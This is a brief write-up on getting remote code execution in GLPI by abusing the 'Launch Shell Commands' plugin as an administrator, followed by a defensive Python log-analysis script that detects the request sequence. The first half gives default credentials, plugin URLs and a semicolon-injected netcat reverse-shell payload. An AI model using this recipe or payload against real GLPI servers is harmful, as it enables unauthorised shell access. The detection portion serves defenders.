How to RCE as a GLPI administrator
Gestionnaire Libre de Parc Informatique (GLPI) is a free asset and IT management software package that provides ITIL service desk features, license tracking and software auditing.
https://github.com/glpi-project/glpi
You need to be a super administrator of GLPI to add the plugin and perform the RCE.
The default login is glpi / glpi.
The technique consists of using a plugin that executes commands on the system, such as ping or tracert, and diverting it to run something else, for example a reverse shell.
First, you must add a "GLPI network" key in the general parameters of GLPI, which gives the right to add extensions. You just have to create a free account on the GLPI site and copy and paste the key.
In the Marketplace (/glpi/front/marketplace.php), add the plugin named "Launch Shell Commands".
Edit the ping command page: /glpi/marketplace/shellcommands/front/shellcommand.form.php?id=1
Enter a random string in the tag field. In the parameters field, you can run anything as a command by using a semicolon.
You can use this payload for a reverse shell:
;nc -c /bin/bash localhost 1234
It is simply an "exec" of all the arguments; there are no filters.
We control the variable $commandToExec.
Add a ping command group: /glpi/marketplace/shellcommands/front/commandgroup.php
Finally, to execute the payload: /glpi/marketplace/shellcommands/front/advanced_execution.php
Select the ping command group, a category and a device from the list (if you don't have one, you can create one in Assets).
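For defenders, the request sequence described above is visible in the web server's access log. The following is an added example, not part of the original write-up and not GLPI or plugin code: it flags a client that modifies a command definition and later reaches the execution page. The common/combined log format, the function names and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit

# Paths named in the write-up; suffix match, since the "/glpi" prefix varies.
STAGES = {
    "/front/marketplace.php": "marketplace",
    "/shellcommands/front/shellcommand.form.php": "command_edit",
    "/shellcommands/front/commandgroup.php": "group_edit",
    "/shellcommands/front/advanced_execution.php": "execution",
}
# Assumed log format (common/combined): client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

def parse(line):
    """Return (client, time, method, stage, status) or None if not relevant."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, method, target, status = m.groups()
    path = urlsplit(target).path  # drops "?id=1" and other query strings
    for suffix, stage in STAGES.items():
        if path.endswith(suffix):
            return client, when, method, stage, int(status)
    return None

def find_edit_then_execute(lines):
    """Flag clients that POST a command definition and later reach execution."""
    edited = {}   # client -> time of first accepted POST to the command form
    alerts = []
    for line in lines:
        event = parse(line)
        if event is None:
            continue
        client, when, method, stage, status = event
        if status >= 400:
            continue  # rejected requests (no session, no right) changed nothing
        if stage == "command_edit" and method == "POST":
            edited.setdefault(client, when)
        elif stage == "execution" and client in edited:
            alerts.append({"client": client, "edited": edited[client], "executed": when})
    return alerts

# Constructed sample lines (not taken from a real server).
SAMPLE = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /glpi/front/marketplace.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2024:10:03:40 +0000] "POST /glpi/marketplace/shellcommands/front/shellcommand.form.php HTTP/1.1" 302 0',
    '203.0.113.9 - - [12/Mar/2024:10:04:00 +0000] "GET /glpi/marketplace/shellcommands/front/advanced_execution.php HTTP/1.1" 200 900',
    '198.51.100.7 - - [12/Mar/2024:10:05:11 +0000] "POST /glpi/marketplace/shellcommands/front/advanced_execution.php HTTP/1.1" 200 2048',
]
```

Access logs do not record POST bodies, so the parameter value itself is not visible here; the sequence of requests is the signal.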